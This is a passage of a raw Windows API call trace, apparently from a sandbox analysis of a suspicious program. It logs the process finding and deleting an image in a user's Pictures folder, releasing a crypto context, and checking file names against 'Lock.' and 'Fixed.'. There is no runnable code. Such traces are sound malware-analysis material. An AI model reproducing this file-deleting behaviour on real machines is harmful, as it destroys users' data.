returned 0xb [0210.678] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.678] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.678] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.678] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.678] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.678] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.678] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.678] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.678] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.678] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.678] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0210.678] CryptReleaseContext (hProv=0xa7c088, dwFlags=0x0) returned 1 [0210.678] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.678] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.678] FreeLibrary (hLibModule=0x76390000) returned 1 [0210.678] CloseHandle (hObject=0x520) returned 1 [0210.680] CloseHandle (hObject=0x4dc) returned 1 [0210.685] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.685] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.685] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/ktNHTaW.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ktNHTaW.bmp", lpFilePart=0x8cedf4*="ktNHTaW.bmp") returned 0x24 [0210.686] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ktNHTaW.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ktnhtaw.bmp")) returned 0x20 [0210.686] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\ktNHTaW.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c9c1d90, ftCreationTime.dwHighDateTime=0x1d5d3cb, ftLastAccessTime.dwLowDateTime=0x534da710, ftLastAccessTime.dwHighDateTime=0x1d5c9b1, ftLastWriteTime.dwLowDateTime=0x534da710, ftLastWriteTime.dwHighDateTime=0x1d5c9b1, nFileSizeHigh=0x0, nFileSizeLow=0x18cc1, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ktNHTaW.bmp", cAlternateFileName="")) returned 0x9e2238 [0210.686] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ktNHTaW.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ktnhtaw.bmp")) returned 1 [0210.690] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c9c1d90, ftCreationTime.dwHighDateTime=0x1d5d3cb, ftLastAccessTime.dwLowDateTime=0x534da710, ftLastAccessTime.dwHighDateTime=0x1d5c9b1, ftLastWriteTime.dwLowDateTime=0x534da710, ftLastWriteTime.dwHighDateTime=0x1d5c9b1, nFileSizeHigh=0x0, nFileSizeLow=0x18cc1, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ktNHTaW.bmp", cAlternateFileName="")) returned 0 [0210.690] FindClose (in: hFindFile=0x9e2238 | out: hFindFile=0x9e2238) returned 1 [0210.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.691] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0210.691] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5d0 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.691] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0210.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0210.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0210.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4a) returned 0x29eaef8 [0210.693] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/ktNHTaW.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ktNHTaW.bmp", lpFilePart=0x8cf650*="ktNHTaW.bmp") returned 0x24 [0210.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaef8 | out: hHeap=0x2af0000) returned 1 [0210.693] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ktNHTaW.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ktnhtaw.bmp")) returned 0xffffffff [0210.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.693] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0210.693] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.693] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LloJL.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="loJL.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oJL.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JL.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0210.694] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0210.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0210.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0210.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0210.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0210.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7220 [0210.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0210.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LloJL.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="loJL.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oJL.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JL.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0210.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0210.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0210.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.696] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.696] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0210.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0210.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.697] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0210.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0210.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0210.697] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0210.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0210.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.697] RtlAllocateHeap 